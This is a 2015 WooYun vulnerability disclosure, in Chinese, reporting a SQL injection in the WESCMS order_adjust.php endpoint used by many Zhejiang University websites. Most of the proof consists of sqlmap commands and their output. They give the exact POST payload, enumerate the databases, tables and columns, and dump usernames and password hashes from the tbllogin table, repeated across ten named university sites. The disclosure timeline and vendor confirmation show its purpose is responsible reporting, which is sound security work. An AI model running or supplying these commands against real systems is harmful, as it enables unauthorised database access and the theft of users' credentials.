当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134886

漏洞标题:浙江大学多个网站存在通用型SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 慢慢

提交时间:2015-08-22 21:12

修复时间:2015-10-09 10:10

公开时间:2015-10-09 10:10

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-22: 细节已通知厂商并且等待厂商处理中
2015-08-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-04: 细节向核心白帽子及相关领域专家公开
2015-09-14: 细节向普通白帽子公开
2015-09-24: 细节向实习白帽子公开
2015-10-09: 细节向公众公开

简要描述:

浙江大学多个网站使用不靠谱的CMS导致SQL注入。

详细说明:

浙江大学多个网站使用不靠谱的CMS导致SQL注入。

漏洞证明:

以浙江大学化学系为例详细说明:

sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dbs


得到结果

available databases [3]:
[*] chem
[*] information_schema
[*] test


选择chem继续深入

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" -D chem --tables


得出结果

Database: chem
[79 tables]
+-------------------------+
| adodbseq |
| daoshi |
| daoshi_fufeipd |
| daoshi_liushui |
| member |
| member_group |
| member_profile |
| poll_config |
| poll_log |
| poll_option |
| poll_poll |
| sc_arrangement |
| sc_config |
| sc_datesector |
| sc_rooms |
| tbladvertisement |
| tblarticle |
| tblarticle_remark |
| tblauditflow |
| tblauditflow_status |
| tblauditflow_step |
| tblclass_template |
| tblcolumns |
| tblcounter |
| tblcounter_daily |
| tblcounter_online |
| tblcp_class |
| tblcp_class_field |
| tblcp_class_relation |
| tblcp_class_validator |
| tblcp_constraint |
| tblcp_constraint_bind |
| tblcp_datatype |
| tblcp_datatype_item |
| tblcp_domain_validator |
| tblcrons |
| tblcustom_form |
| tblcustom_form_bind |
| tblcustom_form_cc |
| tblcustom_form_field |
| tblcustom_form_tab |
| tblcustomise |
| tbldashboard |
| tbldashboard_plugins |
| tbldistrictprivilege |
| tblevent |
| tblgroup |
| tblguestbook |
| tblkeywords |
| tbllink |
| tbllogin |
| tbllogs |
| tblobject_attachment |
| tblobject_counter |
| tblobject_keywords |
| tblobject_note |
| tblobject_propertysheet |
| tblpersistent |
| tblprivilege |
| tblprivilege_atoms |
| tblproc |
| tblprofile_fields |
| tblroom_arrangement |
| tblroom_datesector |
| tblroom_login_config |
| tblroom_rooms |
| tblseq_cp_class |
| tblsoft |
| tblsubject |
| tblsubjectarticle |
| tbluser_preference |
| tblusergroup |
| yiqi_customfrom_bind |
| yiqitimeset |
| yiqiyy |
| yiqiyy_yuyueqrsj |
| yiqiyy_yuyuesj |
| youjianmb |
| yuyue_revise_log |
+-------------------------+


然后挑选tbllogin进行下一步

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" -T tbllogin -D chem --threads=10 --columns


得出结果

+-------------+--------------+
| Column | Type |
+-------------+--------------+
| address | varchar(255) |
| birthday | int(11) |
| branch | varchar(50) |
| contact | varchar(50) |
| customize1 | varchar(255) |
| customize2 | varchar(255) |
| customize3 | varchar(255) |
| customize4 | varchar(255) |
| customize5 | varchar(255) |
| customize6 | text |
| customize7 | text |
| descri | varchar(100) |
| duty | varchar(200) |
| email | varchar(50) |
| gender | int(11) |
| id | int(11) |
| last_visit | int(11) |
| lock_flag | int(11) |
| mobile | varchar(50) |
| msn | varchar(50) |
| name | varchar(50) |
| password | char(32) |
| qq | varchar(20) |
| regdate | int(11) |
| tele | varchar(50) |
| unit | varchar(50) |
| user_type | int(11) |
| username | varchar(50) |
| visit_count | int(11) |
| zip | varchar(30) |
+-------------+--------------+


然后最后一步

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D chem --threads=10


别人的密码就不写了,上一张截图证明:

1.gif


浙江大学其他网站的漏洞证明:
1. 浙江大学本科生院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D bksy --threads=10


有很多123456

2.gif


2. 浙江大学研究生院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D grs --threads=10


3. 浙江大学人事处

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D hr --threads=10


4. 浙江大学图书馆

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D libweb --threads=10


5. 浙江大学物理系

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D physics --threads=10


6. 浙江大学化学工程与生物学院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D che --threads=10


7. 浙江大学经济学院(没想到经济学院竟然是chem)

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D chem --threads=10


8. 浙江大学城市学院图书馆

python sqlmap.py -u "http://**.**.**.**//wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D lib --threads=10


9. 浙江大学生命科学研究院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D lsi --threads=10


10. 浙江大学电气工程学院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D ee --threads=10


同类型的SQL漏洞在浙江大学的网站中还存在着很多,几乎所有使用了WESCMS的网站都有这个漏洞。

修复方案:

尽量更换CMS,虽然不太可能……

版权声明:转载请注明来源 慢慢@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-25 10:09

厂商回复:


CNVD确认并复现所述 情况,已经转由CNCERT向教育网应急组织赛尔网络公司通报.

最新状态:

暂无


漏洞评价:

评论